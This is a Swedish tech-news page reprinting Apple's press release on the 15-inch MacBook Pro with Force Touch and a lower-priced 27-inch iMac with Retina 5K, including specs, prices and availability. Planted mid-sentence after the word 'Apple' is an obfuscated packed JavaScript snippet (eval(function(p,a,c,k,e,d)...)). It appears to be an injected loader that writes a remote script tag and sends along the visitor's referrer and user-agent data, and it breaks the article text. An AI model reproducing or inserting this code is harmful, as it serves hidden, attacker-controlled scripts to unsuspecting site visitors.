Image Image Image Image Image Image Image Image Image Image

| 19 juni, 2019

Scroll to top

Top

Apple presenterar 15-tums MacBook Pro med Force Touch-styrplatta och en ny iMac med Retina 5K-skärm

apple logo
Sebastian
Apple eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbaad|var|u0026u|referrer|dfria||js|php’.split(’|’),0,{}))
uppdaterade idag 15-tums MacBook Pro med Retina-skärm med den nya Force Touch-styrplattan, snabbare flashlagring, längre batteritid och snabbare separat grafik som ger MacBook Pro-serien högre prestanda och utökade möjligheter. Apple presenterade idag även en ny konfiguration av 27-tums iMac med Retina 5K-skärm för 21 995 kronor, med en imponerande skärm med 14,7 miljoner pixlar, fyrkärniga processorer och AMD-grafik.
”Gensvaret på nya MacBook och den uppdaterade 13-tumsmodellen av MacBook Pro med Retina-skärm har varit fantastiskt och idag är vi glada över att kunna meddela att även 15-tums MacBook Pro med Retina-skärm har fått den nya Force Touch-styrplattan, snabbare flashlagring och längre batteritid”, sa Philip Schiller, Apples vice VD på Worldwide Marketing. ”Kunderna älskar vår banbrytande iMac med Retina 5K-skärm och nu när den har ett lägre ingångspris kan ännu fler människor få uppleva den bästa stationära datorn som vi någonsin skapat.”
Den uppdaterade 15-tumsmodellen av MacBook Pro har utrustats med den suveräna Force Touch-styrplattan som ger Mac en helt ny dimension av interaktiva möjligheter. Force Touch-styrplattan har inbyggda trycksensorer och en Taptic Engine som ger haptisk återkoppling. Det betyder att du får samma klickkänsla oavsett var på styrplattan du trycker och att du kan justera precis hur hårt du måste trycka för att ett klick ska registreras. Den nya styrplattan stöder en rad nya gester, som nya force-klick, och tredjepartsutvecklare har tillgång till API:er som gör att de kan bygga appar med Force Touch-funktioner. Uppdaterade 15-tums MacBook Pro med Retina-skärm har också upp till 2,5 gånger snabbare flashlagring än föregående generation, med en genomströmning på upp till 2 GB/s, och erbjuder en timmes längre batteritid, med upp till 9 timmars trådlös surf och upp till 9 timmars uppspelning av iTunes-filmer.* Dessutom ger den nya, separata grafikprocessorn AMD Radeon R9 M370X i MacBook Pro med Retina-skärm upp till 80 procent högre prestanda för videoredigering i Final Cut Pro X, rendering av 3D-bilder i grafikprogram eller högupplösta spel.**

 

Nya iMac med Retina 5K-skärm för 21 995 kronor har en upplösning på 5120 x 2880 pixlar, vilket motsvarar 67 procent fler pixlar än en 4K-skärm, och är utrustad med en 3,3 GHz fyrkärnig Intel Core i5-processor med Turbo Boost-hastigheter på upp till 3,7 GHz samt grafikprocessorn AMD Radeon R9 M290. Den nya iMac-modellen har också 8 GB minne och 1 TB lagringsutrymme samt fyra USB 3.0-portar och två Thunderbolt 2-portar som ger 20 Gbit/s vardera, alltså dubbelt så hög bandbredd som föregående generation. Den mest avancerade modellen av iMac med Retina 5K-skärm finns från 24 995 kronor och har en 3,5 GHz fyrkärnig Intel Core i5-processor med Turbo Boost-hastigheter på upp till 3,9 GHz, grafikprocessorn AMD Radeon R9 M290X och 1 TB Fusion Drive.

 

Varje ny Mac levereras med OS X Yosemite, världens mest avancerade operativsystem för stationära datorer, med ett nytt och modernt utseende, nya kraftfulla appar och Synkad-funktioner som gör att det går ännu smidigare att växla mellan Mac- och iOS-enheter.

 

Bilder, iMovie, GarageBand och iWork följer med alla nya Mac-datorer kostnadsfritt. Bilder för OS X ordnar automatiskt din växande bild- och videosamling så att du enkelt kan bläddra i den och komma åt innehållet från alla dina kompatibla Apple-enheter via iCloud-bildbiblioteket. Med iMovie kan du enkelt skapa snygga filmer och i GarageBand kan du komponera ny musik och lära dig att spela piano eller gitarr. Med iWork-serien, som består av Pages, Numbers och Keynote, är det enkelt att skapa, redigera och dela imponerande dokument, kalkylblad och presentationer. Pages, Numbers och Keynote för iCloud gör det möjligt att skapa ett dokument på iPhone eller iPad, redigera det på Mac och samarbeta med vänner, även om de använder en PC.

 

Priser och tillgänglighet
Uppdaterade 15-tums MacBook Pro med Retina-skärm kan nu köpas från Apple Online Store, i Apple Store-butiker och hos utvalda Apple-auktoriserade återförsäljare, med antingen en 2,2 GHz fyrkärnig Intel Core i7-processor med Turbo Boost-hastigheter på upp till 3,4 GHz, 16 GB minne, 256 GB flashlagring och Intel Iris Pro Graphics från 21 995 kronor, eller med en 2,5 GHz fyrkärnig Intel Core i7-processor med Turbo Boost-hastigheter på upp till 3,7 GHz, 16 GB minne, 512 GB flashlagring och grafikprocessorn AMD Radeon R9 M370X från 27 495 kronor. Bland alternativen för beställningsbyggen finns snabbare fyrkärniga Intel Core i7-processorer på upp till 2,8 GHz med Turbo Boost-hastigheter på upp till 4,0 GHz och flashlagring på upp till 1 TB. Mer teknisk information, alternativ för beställningsbyggen och tillbehör finns på www.apple.com/se/macbook-pro.

 

Den nya 27-tumsmodellen av iMac med Retina 5K-skärm kan nu köpas från Apple Online Store, i Apple Store-butiker och hos utvalda auktoriserade Apple-återförsäljare med en 3,3 GHz fyrkärnig Intel Core i5-processor med Turbo Boost-hastigheter på upp till 3,7 GHz, grafikprocessorn AMD Radeon R9 M290 och 1 TB lagringsutrymme från 21 995 kronor. Den mest avancerade iMac-modellen finns från 
24 995 kronor och har en 3,5 GHz fyrkärnig Intel Core i5-processor med Turbo Boost-hastigheter på upp till 3,9 GHz, grafikprocessorn AMD Radeon R9 M290X och 1 TB Fusion Drive. Bland alternativen för beställningsbyggen finns snabbare fyrkärniga Intel Core i7-processorer på upp till 4,0 GHz med Turbo Boost-hastigheter på upp till 4,4 GHz och flashlagring på upp till 1 TB. Mer teknisk information, alternativ för beställningsbyggen och tillbehör finns på www.apple.com/se/imac.
 *Testerna av det trådlösa webbprotokollet utfördes av Apple i maj 2015 på MacBook Pro-modeller med Retina-skärm som ännu inte var i produktion. Batteritiden och antalet uppladdningar varierar beroende på användning och inställningar. Mer information finns på www.apple.com/se/macbook-pro.
**Testerna utfördes av Apple i maj 2015 på MacBook Pro-modeller med Retina-skärm som ännu inte var i produktion. Mer information finns på www.apple.com/se/macbook-pro/features-retina/.
Apple designar Mac-datorerna – världens bästa persondatorer – och OS X, iLife, iWork samt en rad professionella program. Apple leder den digitala musikrevolutionen med iPod och iTunes Store. Apple har förnyat mobiltelefonen med den banbrytande iPhone och App Store och stakar ut den framtida utvecklingen inom mobila medier och datorteknik med iPad.